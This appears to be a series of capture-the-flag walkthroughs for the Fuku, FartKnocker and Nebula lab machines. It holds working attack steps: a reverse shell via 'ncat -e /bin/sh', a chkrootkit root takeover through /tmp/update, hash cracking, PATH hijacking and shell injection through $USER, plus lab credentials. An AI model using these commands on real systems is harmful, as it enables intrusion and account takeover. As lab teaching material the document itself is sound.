Walkthrough Fuku

I have just finished another VM. The very annoying, but fun, machine called Fuku. As in Fuck you, I guess. It was designed to really mess with the challenger.

Okay, so let’s get started.

So after scanning the machine I saw that all ports were open, but only SSH on port 22 was a real service. I tried a few basic passwords on it, but I got blocked pretty fast; I am guessing some fail2ban service. The rest of the ports just output a FUKU note, so they were false positives. So I wrote a Python script to try out every port possible. But that wasn't easy. First I wrote it to check the return length, but that didn't turn up anything, which was quite annoying. I also added multithreading to be able to check the ports faster:

from multiprocessing.dummy import Pool as ThreadPool
pool = ThreadPool(2)
results = pool.map(testPorts, minArr)

So then I had to rewrite the script to make a GET request instead. Anyhow, I found the Joomla service on port 13370 after a lot of work. I ran joomscan on it and found a lot of vulnerabilities, especially one that creates an admin user for you. So I did that. Here is the exploit I used: https://www.exploit-db.com/exploits/6234/
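What the scanning script ended up needing is a way to tell portspoof's decoy answers from a real service, which a plain length check cannot do. Here is an added example of that approach (my code, not the script from the original post): it probes every port in parallel with a small HTTP request and sorts each port by what comes back. The decoy marker, the probe string and the worker count are assumptions about this box, and the probe function is injectable so the classification can be exercised without a network.

```python
import socket
from concurrent.futures import ThreadPoolExecutor

# Assumptions for this box: decoy ports answer with a FUKU banner, and the
# real web service answers an HTTP request with a status line.
DECOY_MARKER = b"FUKU"
HTTP_PROBE = b"GET / HTTP/1.0\r\nHost: target\r\n\r\n"

def probe_port(host, port, timeout=2.0):
    """Connect, send the probe and collect up to 4 KiB of reply.
    Returns None if the port is closed/filtered, b"" if it is open but silent."""
    chunks = []
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(HTTP_PROBE)
            try:
                while sum(map(len, chunks)) < 4096:
                    data = s.recv(4096)
                    if not data:
                        break
                    chunks.append(data)
            except socket.timeout:
                pass   # server kept the connection open; use what we have
    except OSError:
        return None
    return b"".join(chunks)

def classify(response):
    """Map a raw reply to one of: closed, silent, decoy, http, other."""
    if response is None:
        return "closed"
    if not response:
        return "silent"
    if DECOY_MARKER in response:
        return "decoy"
    if response.startswith(b"HTTP/"):
        return "http"
    return "other"

def scan(host, ports, probe=probe_port, workers=64):
    """Probe `ports` in parallel and return {port: class}.
    `probe(host, port)` is injectable so the logic can run offline."""
    with ThreadPoolExecutor(max_workers=workers) as pool:
        return dict(pool.map(lambda p: (p, classify(probe(host, p))), ports))

def interesting(report):
    """Everything that is neither a decoy nor closed is worth a manual look."""
    return sorted(p for p, kind in report.items() if kind not in ("decoy", "closed"))

if __name__ == "__main__":
    import sys
    target = sys.argv[1]
    report = scan(target, range(1, 65536))
    for port in interesting(report):
        print(port, report[port])
```

A real service that does not speak HTTP (SSH, for instance) still lands in "other" because its banner is neither the decoy text nor an HTTP status line, which is exactly the short list you want to look at by hand.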

The page was in Japanese, but it wasn't that hard to create the admin user. But once I was in it was really difficult to understand what was going on. I thought I had changed the language so many times. And I tried to change it. At one point I thought English had been removed completely just for the sake of FUKU. But in the end I found it.

Then came the next challenge. How to upload a shell. I tried to turn off all forms of editors to be able to insert PHP, but nothing worked. So I tried to enable FTP, but that didn't work since that port was already in use. I tried to upload a shell through the media uploads, but that blocked the code. So after some heavy googling on how to run PHP I ended up installing the DirectPhp plugin. This one: http://www.kksou.com/php-gtk2/joomla/directphp-plugin.php#download

So I uploaded my reverse-shell and got in.

The first thing I wanted to do was to spawn a shell:

$ python -c 'import pty; pty.spawn("/bin/sh")'
haha! FUKU! Only root can run that command.

That together with a few other commands was blocked. And since I couldn’t get a tty-shell I was unable to use sudo and su.

So I started to mess around with the MySQL database. Which was quite difficult without a tty shell. It was really buggy. Oh yeah, I found the MySQL login credentials in configuration.php in /var/www/html. So I looked around in the database fuku and found gizmo's user. So I got the hash and cracked it with hashcat.

hashcat -m 11 -a 0 -o found.txt admin.hash /usr/share/wordlists/rockyou.txt -r /usr/share/hashcat/rules/rockyou-30000.rule

(-m 11 is the Joomla < 2.5.18 md5($pass.$salt) mode. In a straight attack, -a 0, the argument after the hash file is the wordlist and the rule file has to be given with -r; the rockyou.txt path is the usual Kali location and is an assumption here.)

Only to find that gizmo used the same password for his user as for the database: sillyboy. So that was not so useful. There was also another admin user and an admin account in tacacs. "admin ht70zyjHsMl3A".

So I transferred my enumeration script and started enumerating. I found that it was an Ubuntu 15.04 machine. So I figured I could try the standard overlayfs exploits that work on quite a few Ubuntus. But gcc was somehow blocked.

www-data@Fuku:/tmp$ gcc exp.c -o exp
gcc exp.c -o exp
haha! FUKU! Only root can run that command.

So I compiled the exploit on my machine and then did a wget to transfer it. But it wouldn't run since www-data lacked certain rights.

Then I got stuck for quite some time. And I cheated a bit, just to read the word chkrootkit. So I found that program running and I looked for an exploit for it. And found this: https://www.exploit-db.com/exploits/33899/
Pretty crazy exploit. An incredible priv-esc exploit from a program that attempts to stop rootkits. So after some trial and error with using the exploit I finally just wrote:

echo "echo root:adminadmin | chpasswd" > /tmp/update
chmod +x /tmp/update

(chkrootkit 0.49 runs /tmp/update as root when it exists and is executable, which is what the linked exploit relies on, so the file has to live in /tmp and carry the execute bit.)

And then I logged in using ssh. But that was after going a bit crazy in trying to get a tty-shell for www-data. So that was it. I got root and the flag.

Yep, this is a flag. It's worth over 9000 Internet points!
Random keyboard smash: lkhI6u%RdFEtDjJKIuuiI7i&*iuGf)8$d4gfh%4

In the root folder were all the programs and tools that I was blocked from using.

19700101      chkrootkit-0.49  flag.txt  g++-4.9  gcc-4.9  gcc-ar-4.9  gcc-nm-4.9  gcc-ranlib-4.9  ifconfig  mlocate    python     uname  whoami
change_ip.sh  cpp-4.9          fuku      gcc      gcc-ar   gcc-nm      gcc-ranlib  id              locate    portspoof  python2.7  which

Conclusion

I spent a lot of time writing the Python script. So that was a good learning experience. Finding chkrootkit was probably the hardest. I should have seen that it was an unusual service. All in all a really fun challenge! Thanks https://www.vulnhub.com/author/robert-winkel,190/ Robert Winkel for the machine! Frustrating but fun!

Walkthrough FartKnocker

Another VM is done. Here is the writeup. And here is the link to the VM on vulnhub.

Recon

$ netdiscover -r 192.168.1.1/24 
192.168.1.103   08:00:27:3d:0d:c8      1      60  Cadmus Computer System

The Nmap-scan.

Not shown: 65534 closed ports
Reason: 65534 resets
PORT   STATE SERVICE REASON         VERSION
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.7 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 08:00:27:3D:0D:C8 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.4
TCP/IP fingerprint:
OS:SCAN(V=7.12%E=4%D=5/9%OT=80%CT=1%CU=42070%PV=Y%DS=1%DC=D%G=Y%M=080027%TM
OS:=57311E63%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=106%TI=Z%CI=I%II=I%
OS:TS=8)OPS(O1=M5B4ST11NW7%O2=M5B4ST11NW7%O3=M5B4NNT11NW7%O4=M5B4ST11NW7%O5
OS:=M5B4ST11NW7%O6=M5B4ST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=
OS:7120)ECN(R=Y%DF=Y%T=40%W=7210%O=M5B4NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%
OS:A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S
OS:=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R
OS:=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N
OS:%T=40%CD=S)

So port 80 is the only one open. An interesting little detail here is that it says that it found “65534 closed ports”, and then it says: Reason: 65534 resets. I think that means that the server has responded with RST/ACK. Something I learned in this challenge. But we will get to that.

On port 80 we find a file named pcap1.pcap. So I open it up in wireshark.
To the experienced packet inspector I guess it is quite obvious what is going on in this packet capture. But I had never heard about port knocking. So I got lost on a detour for quite some time. I was inspecting the ICMP packets. All of those packets ended with "!"#$%&'()*+,-./01234567". Something that I thought was suspicious. So I started googling about hacks that use ICMP and found a lot.

It turns out that you can use the ICMP-protocol to hide, or tunnel, other services. So I thought that someone had injected a Loki-rootkit into the server, and what I was observing was the communication between the hacker (with ip …102) and the victim-server. And that I was supposed to enter through the same exploit. But after going through the ICMP-packets in detail I realized that they really were just pings, and nothing else. They never contained more data than the default “!”#$%&'()*+,-./01234567”, which I learned could be used to fingerprint the server. This data meant that the server probably was a linux. So after discarding all the ICMP packets I started to look into the TCP-packets more closely. And after some creative googeling about ports I learned about port-knocking.

Port knocking

So I downloaded knockd, which is used to implement port knocking (the client is called knock). And I got it to work by running this command:

knock 192.168.1.103 7000 8000 9000
nc 192.168.1.103 8888

This also worked:

for x in 7000 8000 9000; do nmap -Pn --host_timeout 201 --max-retries 0 -p $x 192.168.1.103; done
nc 192.168.1.103 8888

And this:

nc 192.168.1.103 7000
nc 192.168.1.103 8000
nc 192.168.1.103 9000
nc 192.168.1.103 8888
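The three variants above all do the same thing: make the server see one connection attempt per port, in the right order, and then connect to the port that opens. The knock sequences in this VM (7000 8000 9000 for port 8888, 1 3 3 7 for port 1337, and 8888 9999 7777 6666 for port 22) are all instances of that mechanism. Below is an added example, not from the original post and not knockd's code, that shows both halves: a client that sends the knocks and a small knockd-style tracker that only unlocks the protected port once a source has hit the sequence in order within a time window. The addresses in it are placeholders, and the connect function is injectable so the sequencing can be checked without a network.

```python
import base64
import re
import socket
import time

def ports_from_hint(b64):
    """Decode a base64 hint such as the one served on /iamcornholio/ and
    return the port numbers it names, in the order they appear."""
    text = base64.b64decode(b64).decode("ascii", "replace")
    return [int(p) for p in re.findall(r"\b\d{1,5}\b", text)]

def knock(host, sequence, connect=None, delay=0.2, timeout=0.5):
    """Client side: one TCP connection attempt per port, in order. knockd only
    has to see the SYN, so refused or timed-out connects are the normal case.
    `connect(port)` is injectable so the sequencing can be tested offline."""
    if connect is None:
        def connect(port):
            try:
                socket.create_connection((host, port), timeout=timeout).close()
            except OSError:
                pass          # expected: nothing listens on the knock ports
    sent = []
    for port in sequence:
        connect(port)
        sent.append(port)
        if delay:
            time.sleep(delay)
    return sent

class KnockSequence:
    """Server side, in the spirit of knockd: a source must hit the ports in
    order, each knock within `window` seconds of its previous one. A wrong
    port resets that source's progress; completing the sequence unlocks
    `opens_port` for that source."""

    def __init__(self, sequence, opens_port, window=10.0):
        self.sequence = list(sequence)
        self.opens_port = opens_port
        self.window = window
        self.progress = {}        # source -> (next index expected, time of last hit)
        self.opened = set()

    def hit(self, source, port, now=None):
        """Record one knock. Returns True once the source has unlocked the port."""
        now = time.time() if now is None else now
        idx, last = self.progress.get(source, (0, now))
        if now - last > self.window:
            idx = 0                            # too slow: start over
        if port == self.sequence[idx]:
            idx += 1
        elif port == self.sequence[0]:
            idx = 1                            # stray first knock restarts the sequence
        else:
            idx = 0
        if idx == len(self.sequence):
            self.opened.add(source)
            idx = 0
        self.progress[source] = (idx, now)
        return source in self.opened

    def allowed(self, source, port):
        """Would a connection from `source` to `port` be let through now?"""
        return port == self.opens_port and source in self.opened

if __name__ == "__main__":
    target = "192.168.1.103"
    knock(target, ports_from_hint("T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK"))
    print("knocked; now try ssh to", target)
```

The sequence is the whole secret, so anyone who can sniff the knocks (as the pcap files on this box let you do) can replay them; knockd's time window and strict ordering are there to stop scanners from stumbling into the sequence, not to resist an observer.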

Anyways, it led me to this address: /burgerworld. I downloaded the pcap file and continued. I went through each and every packet in detail to understand how they all worked. But I am not going to bore you with that. So I right-clicked on a TCP packet and then clicked on Follow TCP Stream. And it showed me a nice ASCII image of Beavis (or Butthead, can't remember who's who). And the text: eins drei drei sieben. So I google-translated the text, and it was what I thought, the classic number 1337. So after trying every single possible combination of port knocking I finally figured out that it was supposed to be 1 3 3 7. And then nc to port 1337. There I found: /iamcornholio/ which gave me this text:

“huhhuhhh…Hey Beavis…Im all about uhhh…huhuh…that base huhhuhhh…

T3BlbiB1cCBTU0g6IDg4ODggOTk5OSA3Nzc3IDY2NjYK”
So the base-comment made me think that it was probably base64-encoded. And it was.

It translated into: Open up SSH: 8888 9999 7777 6666
So I knocked the port and got access to port 22.

$ ssh root@192.168.1.103
The authenticity of host '192.168.1.103 (192.168.1.103)' can't be established.
ECDSA key fingerprint is SHA256:uSdkKIWXcJl0j0P5Y+cAzjD9CJOFQ/NxtG8kz8ptzFE.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.1.103' (ECDSA) to the list of known hosts.
############################################
# CONGRATS! YOU HAVE OPENED THE SSH SERVER #
# USERNAME: butthead                       #
# PASSWORD: nachosrule                     #
############################################

So I logged in as butthead, but was immediately thrown out.

From doing some challenges on overthewire I learned that you can execute commands with SSH without getting an actual shell.

But first I downloaded sshpass to be able to make the process a bit easier, and then:

sshpass -p nachosrule ssh butthead@192.168.1.103 ls
nachos

So then I used nc to get a permanent shell.

$ sshpass -p nachosrule ssh butthead@192.168.1.103 "ncat -e /bin/sh 192.168.1.106 1234"

Escalation

So I got a shell, and it was time to escalate.
I ran the LinEnum.sh script and waded through the info. And checked for vulns on sudo. But nothing really of interest. Some meaningless stuff in /tmp, some scripts in beavis. Then I found pcap3 and pcap4. That I studied thoroughly. In pcap4 I saw that there was some SSH key exchange going on, and some encrypted data transfer. But after some googling I concluded that there is not really any way I could possibly break that. SSH with Diffie-Hellman seems pretty waterproof.

In the end I ended up running the Ubuntu 14 priv-exploit that I have used on some other VM:s. This one: https://www.exploit-db.com/exploits/37292/. That exploit really is incredible/incredibly dangerous.

So I became root and got the SECRETZ in /root.

Conclusion

Packet-analysis really was awesome. A lot of fun and interesting stuff. I feel like I have really started to get a grip of how packets are structured, and started to get to know Wireshark a lot more. So the main takeaways from this VM really was learning packet-analysis and about port-knocking.

Thanks to top-hat-sec for another great VM!

After reading other writeups I learned about https://digi.ninja/projects/cewl.php. Which I am really excited about trying out. Gonna try it soon.

Nebula Walkthrough

I started doing the challenges in Nebula. They are not as fun as boot2root VMs but still entertaining. And I have learned some new stuff from it.
I have decided to write down all the levels in this one post, otherwise it would be too many short posts. So this is going to be a giant one, and sometimes way too much detail, and sometimes not enough, oh well. Let's start.

Level 00

We just need to find the flag on this level.

$ find / -user flag00 -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /bin/.../flag00
-rwsr-x--- 1 flag00 level00 7358 2011-11-20 21:22 /rofs/bin/.../flag00

Search for files owned by user flag00 that have the setuid bit set (-perm -4000) and run ls -ld on each one found.
Throw stderr in /dev/null so the permission-denied errors don't flood the output.

cd /bin
cd "..."
./flag00
getflag

Level 01

On this level we are provided with code written in C and the binary version of it. It can be found here: /home/flag01/flag01

$ file flag01
flag01: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

So we know that it is a 32-bit setuid binary. When we run it, the code executes with the effective uid of the file's owner, flag01, even though our real uid is still level01.

total 13
drwxr-x--- 2 flag01 level01   92 2011-11-20 21:22 .
drwxr-xr-x 1 root   root     100 2012-08-27 07:18 ..
-rw-r--r-- 1 flag01 flag01   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 2011-05-18 02:54 .bashrc
-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 flag01
-rw-r--r-- 1 flag01 flag01   675 2011-05-18 02:54 .profile

Since I am a total noob in C I am going to comment this code pretty heavily to understand what is going on.

#include <stdlib.h>
// This is what is says. C's standard library. Useful general
// purpose functions. Generating random numbers, conversions, memory allocation: malloc
// process control. It is from this lib that "system" is taken.

#include <unistd.h>
// Provides access to POSIX API.
// Gives the programmer access to NULL pointer, and symbolic constants like SEEK_SET

#include <string.h>
// A library for manipulating strings.

#include <sys/types.h>
// This library gives access to different data-types. Like gid_t.

#include <stdio.h>
// The standard input and output library.
// printf and scanf are among those functions. printf outputs, and scanf takes input.

int main(int argc, char **argv, char **envp)
// Here we initiate the main function, we do this with three arguments.
// argc is the number of argumnets. Argument count. The count starts from the
// calling of the binary. So ./flag01 is the first argument.
// argv are the argumnets that the user inputs. In this program it appears to be none.
// envp is an array of the environment variables.
{

  gid_t gid;
  uid_t uid;
// Here we declare two variables, but we don't assign them any value.
// We use the data-typs that come from sys/types-lib.
// The data-types are group-id and user-id.

  gid = getegid();
  uid = geteuid();

// getegid()/geteuid() return the *effective* ids. Because the binary is setuid flag01,
// the effective uid is flag01 while the real uid is still level01.
// And we assign those values to the previously created variables.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// So this sets the real, effective and saved gid/uid to the effective ones, making the
// elevated privilege stick for any child process, including the shell that system() starts.

  system("/usr/bin/env echo and now what?");

// system() hands the string to /bin/sh -c. /usr/bin/env does not print anything here:
// given arguments, env looks up "echo" through PATH and executes it with "and now what?".
// Nothing is pinned to /bin/echo, so whichever echo comes first in PATH runs as flag01.

}

How can this then be exploited? Since there is no user-input.
So I figure that I can overwrite the echo-command with a command that I call echo, but does something else.


So I wrote that program in bash

#!/bin/bash
/bin/bash

Then chmod +x echo, and export PATH=/tmp:$PATH. It is important here to add /tmp to the beginning of the PATH variable, otherwise the normal echo is found first and executed.

./flag01
whoami
flag01

We got the flag!

Level 02

So on this level we have another setuid to play with.

cd /home/flag02
level02@nebula:/home/flag02$ file flag02
flag02: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped

Let’s run it and see what happens.

level02@nebula:/home/flag02$ ./flag02
about to call system("/bin/echo level02 is cool")
level02 is cool

This looks a bit like the first level. But let’s analyze the code.

#define _GNU_SOURCE
// Needed so glibc declares asprintf(); not in the original listing, added so it compiles cleanly.
#include <stdlib.h>
// Standard-lib.

#include <unistd.h>
// Lib to get getegid()

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Get new data-types, like gid_t

#include <stdio.h>
// Standard i/o. printf, scanf for example

int main(int argc, char **argv, char **envp)
{
  char *buffer;

// Declare the variable buffer.

  gid_t gid;
  uid_t uid;

// Declare variables.

  gid = getegid();
  uid = geteuid();

// Assign uID and gID into the created varibles.

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

// Set UID.

  buffer = NULL;

// Assign the value NULL to the buffer-varible.

  asprintf(&buffer, "/bin/echo %s is cool", getenv("USER"));
// Lets break it down.
// asprintf allocates the output buffer itself, sized to fit the formatted string,
// so there is no buffer overflow to be had here. The weakness is elsewhere: the value
// of $USER is pasted into a command line unchanged and that line goes to a shell.
// asprinf calculates the length of the string, allocates the amount of memory
// and then writes the string into that memory.

  printf("about to call system(\"%s\")\n", buffer);

// So, the asprintf takes the getenv-username and inputs it into the buffer.
// Then we make a system-call using that buffer.

  system(buffer);
}

Okay, so no user-input is possible. So the solution will be elsewhere.
So we make a system-call that is the following:
“/bin/echo username (taken from en-var) is cool”

So the solution that comes to mind is to insert a username that would be something like
the following: hello && /bin/bash # echo

So I set the username in my environment variable like this:

export USER="&& /bin/bash #"

Then I ran the script, and it gave me the shell, and
then I could just run getflag.
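Levels 01 and 02 are the two classic ways a setuid program's call to system() goes wrong: it trusts PATH (level 01) and it trusts the contents of an environment variable (level 02). The block below is an added example, not code from the Nebula levels, that reproduces both from Python with subprocess, so you can watch them happen without a setuid binary. It assumes /usr/bin/env, /bin/sh and /bin/echo exist, and replaces the real payload (/bin/bash) with a harmless printf.

```python
import os
import subprocess
import tempfile

def path_hijack(args="and now what?"):
    """Level 01: system("/usr/bin/env echo ...") lets env(1) resolve `echo`
    through PATH. Put a fake echo first in PATH and run the same command.
    Returns what the command printed."""
    with tempfile.TemporaryDirectory() as d:
        fake = os.path.join(d, "echo")
        with open(fake, "w") as f:
            # the real level uses /bin/bash here; printf keeps the demo inert
            f.write("#!/bin/sh\nprintf hijacked\n")
        os.chmod(fake, 0o755)
        env = dict(os.environ)
        env["PATH"] = d + os.pathsep + env.get("PATH", "/usr/bin:/bin")
        out = subprocess.run(["/usr/bin/env", "echo"] + args.split(),
                             env=env, capture_output=True, text=True)
        return out.stdout

def user_injection(user):
    """Level 02: asprintf() formats $USER into "/bin/echo %s is cool" and
    system() hands that string to /bin/sh -c, so shell metacharacters in
    USER are interpreted. Returns the shell's stdout."""
    cmdline = "/bin/echo %s is cool" % user
    out = subprocess.run(["/bin/sh", "-c", cmdline], capture_output=True, text=True)
    return out.stdout

def user_injection_fixed(user):
    """Hardened form of the same call: no shell, argv passed as a list, so
    USER is plain data no matter what it contains."""
    out = subprocess.run(["/bin/echo", user, "is", "cool"], capture_output=True, text=True)
    return out.stdout

if __name__ == "__main__":
    print(repr(path_hijack()))
    print(repr(user_injection("&& printf INJECTED #")))
    print(repr(user_injection_fixed("&& printf INJECTED #")))
```

The fixes are the mirror image of the bugs: a privileged program should set PATH itself (or use absolute paths) rather than inherit it, and should never build a shell command line from data it did not generate; execve with an argv list, as in user_injection_fixed, takes the shell out of the picture entirely.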

Level 03

So on this level we have one file and one directory.

level03@nebula:/home/flag03$ ls -lah
total 5.5K
drwxr-x--- 3 flag03 level03  103 2011-11-20 20:39 .
drwxr-xr-x 1 root   root     180 2012-08-27 07:18 ..
-rw-r--r-- 1 flag03 flag03   220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag03 flag03  3.3K 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag03 flag03   675 2011-05-18 02:54 .profile
drwxrwxrwx 2 flag03 flag03     3 2012-08-18 05:24 writable.d
-rwxr-xr-x 1 flag03 flag03    98 2011-11-20 21:22 writable.sh

The directory is world-writable, and writable.sh looks like this:

#!/bin/sh
for i in /home/flag03/writable.d/* ; do
	(ulimit -t 5; bash -x "$i")
	rm -f "$i"
done

So here we can see that it takes every script in writable.d, executes it (with a 5-second CPU limit) and then deletes it. A cronjob runs this every few minutes as flag03.
So after a lot of work and a lot of testing, like copying the sh binary and much else, I realized I didn't have to get a shell; all I need is to execute getflag on the machine.

So I just wrote the following script:

#!/bin/bash
getflag > /tmp/flaggan.txt

I also tried to copy the shell from the flag03-user and give me permissions to use it, but it didn’t work. Not really sure why. But anyways, I got the flag.

Level 04

“About
This level requires you to read the token file, but the code restricts the files that can be read. Find a way to bypass it 🙂
To do this level, log in as the level04 account with the password level04. Files for this level can be found in /home/flag04.”

#include <stdlib.h>
// Standard lib

#include <unistd.h>
// POSIX API: read(), write() and close() come from here.

#include <string.h>
// Lib to manipulate strings

#include <sys/types.h>
// Defines data types such as gid_t and uid_t.

#include <stdio.h>
// Standard I/O

#include <fcntl.h>
// File-control options: the O_RDONLY flag used with open().

#include <err.h>
// err(): print a message plus strerror(errno) and exit. Not in the original
// includes; added so the file compiles without an implicit declaration.

int main(int argc, char **argv, char **envp)
{
  char buf[1024];
// A 1024-byte (one kilobyte) buffer: the file contents are read into here.

  int fd, rc;
// Here we declare two variables.

  if(argc == 1) {
    // What to do if there is only one cli-argument.
      printf("%s [file to read]\n", argv[0]);
      exit(EXIT_FAILURE);
    // EXIT_FAILURE comes from some std lib.
    // This seems to be mostly harmless.
  }

  if(strstr(argv[1], "token") != NULL) {
    // strstr(haystack, needle) returns a pointer to the first occurrence of needle
    // in haystack, or NULL if it does not occur. So the program refuses any argument
    // whose *string* contains "token". It checks the name we typed, not the file
    // that name resolves to.
      printf("You may not access '%s'\n", argv[1]);
      exit(EXIT_FAILURE);
  }

  fd = open(argv[1], O_RDONLY);
  // Here we initialize and declare the fd variable.
  // It appears to open the file, in a read-only manner, and then save it in
  // the variable fd.

  if(fd == -1) {
    // open() returns -1 on any failure: file missing, permission denied, and so on.
      err(EXIT_FAILURE, "Unable to open %s", argv[1]);
  }

  rc = read(fd, buf, sizeof(buf));

// So here we take the input file, and read it. The buffer-size is here.


  if(rc == -1) {
    // read() returns -1 if the read itself fails, for example because argv[1] was a directory.
      err(EXIT_FAILURE, "Unable to read fd %d", fd);
  }

  write(1, buf, rc);
  // Here we write to standard out (the 1 indicates it).
}

I started trying to encode the file name and some other stuff, that didn’t work. Then it hit me. I can just create a link.

level04@nebula:/tmp/04$ ln -s /home/flag04/token ./test
level04@nebula:/tmp/04$ ls
test  test.sh
level04@nebula:/tmp/04$ /home/flag04/flag04 ./test
06508b5e-8909-4f38-b630-fdb148a848a2

Wohoo, it worked!
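The bug is that the policy is applied to the string the caller typed instead of to the object that string ends up naming. As an added example (mine, not the level's code), the block below puts flag04's check beside two stronger ones and runs all three against a symlink and a hard link to a scratch "token" file. It assumes a writable temp directory and a filesystem that supports hard links; the file contents are made up.

```python
import os
import tempfile

FORBIDDEN = "token"

def name_check(arg):
    """flag04's test: a substring match on argv[1] as typed."""
    return FORBIDDEN not in arg

def canonical_check(arg):
    """Resolve symlinks and '..' first, then apply the same policy to the
    real path. Fails closed when the path does not exist."""
    resolved = os.path.realpath(arg)
    if not os.path.exists(resolved):
        return False
    return FORBIDDEN not in resolved

def open_guarded(arg, protected):
    """Stronger still: open without following a final symlink, then compare
    (device, inode) of what was actually opened against the protected file.
    This also catches hard links, which realpath() cannot see, and decides
    on the opened object rather than on a name that may change underneath.
    Returns an open fd, or None when access is denied."""
    try:
        fd = os.open(arg, os.O_RDONLY | os.O_NOFOLLOW)
    except OSError:            # ELOOP for a symlink, ENOENT, EACCES, ...
        return None
    st, pst = os.fstat(fd), os.stat(protected)
    if (st.st_dev, st.st_ino) == (pst.st_dev, pst.st_ino):
        os.close(fd)
        return None
    return fd

def symlink_bypass_demo():
    """Build a scratch token file, a symlink and a hard link to it, and
    report which checks each trick gets past (True = allowed)."""
    with tempfile.TemporaryDirectory(prefix="lvl04_") as d:
        token = os.path.join(d, "token")
        link = os.path.join(d, "innocent")
        hard = os.path.join(d, "harmless")
        with open(token, "w") as f:
            f.write("not-the-real-token\n")      # constructed content
        os.symlink(token, link)
        os.link(token, hard)
        result = {
            "name_check_symlink": name_check(link),
            "canonical_check_symlink": canonical_check(link),
            "canonical_check_hardlink": canonical_check(hard),
        }
        for label, path in (("open_guarded_symlink", link), ("open_guarded_hardlink", hard)):
            fd = open_guarded(path, token)
            result[label] = fd is not None
            if fd is not None:
                os.close(fd)
        return result

if __name__ == "__main__":
    for check, allowed in symlink_bypass_demo().items():
        print("%-26s %s" % (check, "ALLOWED" if allowed else "denied"))
```

Note what each step buys: realpath() closes the symlink hole but not the hard-link one, and even the inode comparison only works when the program knows which file it is guarding. The robust fix for a setuid reader is not a better blacklist but dropping privileges before the open, so the kernel's own permission check decides.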

Level 05

About
Check the flag05 home directory. You are looking for weak directory permissions
To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05.

So I just read the files.

level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa.pub

ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDLAINcUvucamDG5PzLxljLOJ/nrkzot7EQJ9pEWXoQJC0/ZWm+ezhFHQd5UWlkwPZ2FBDvqxdcrgmmHT/FVGBjK0XWGwIkuJ50nf5pbJExi2SC9kNMMMP2VgY/OxvcUuoGhzEISlgkuu4hJjVh3NeliAgERVzxKCrxSvW48wcAxg4v5vceBra6lY7u8FT2D3VIsHogzKN77Z2g7k2qY82A0vOqw82e/h6IXLjpYwBur0rm0/u3GFB1HFhnAxuGcn4IsnQSBdQCB2S+eOUZ4PmiQ/rUSHuVvMeLCzrxKR+UG9zDwoCwwXpNJehAQJGCiL3JzBNnLjFaylSqKP6xj7cR user@wwwbugs
level05@nebula:/home/flag05/.backup$ tar -Oxf backup-19072011.tgz .ssh/id_rsa
-----BEGIN RSA PRIVATE KEY-----
(key body omitted)
-----END RSA PRIVATE KEY-----

Then I saved it down and sshed into the flag-user.

level05@nebula:/tmp/05/.ssh$ ssh -i id_rsa flag05@192.168.1.105

Level 06

Old Unix password config. Okay, I know that passwords were stored in /etc/passwd before they were moved to /etc/shadow.

cat /etc/passwd
flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh

Looks like it can be done with john the ripper.

So I just copy-pasted the hash into a file and then ran john on it like this

 $ john level06Hash
Using default input encoding: UTF-8
Loaded 1 password hash (descrypt, traditional crypt(3) [DES 128/128 AVX-16])
Press 'q' or Ctrl-C to abort, almost any other key for status
hello            (?)
1g 0:00:00:00 DONE 2/3 (2016-05-08 11:29) 2.777g/s 355.5p/s 355.5c/s 355.5C/s 123456..marley
Use the "--show" option to display all of the cracked passwords reliably
Session completed

So that was easy.

Level 07

This level was a bit tricky. It is about teaching command injection, and a couple of articles on the subject were really useful.

So we have a few files.
.lesshst – the history file from the program less

level07@nebula:~$ cat .viminfo
# File marks:
'0  1  0  ~/index.cgi?Host=|getflag|
'1  1  0  ~/index.cgi

# Jumplist (newest first):
-'  1  0  ~/index.cgi?Host=|getflag|
-'  1  0  ~/index.cgi
-'  1  0  ~/index.cgi

# History of marks within files (newest to oldest):

> ~/index.cgi?Host=|getflag|
	"	1	0

And here is the cgi-code.

  #!/usr/bin/perl

  use CGI qw{param};

  print "Content-type: text/html\n\n";

  sub ping {
    $host = $_[0];

    print("<html><head><title>Ping results</title></head><body><pre>");

    @output = `ping -c 3 $host 2>&1`;
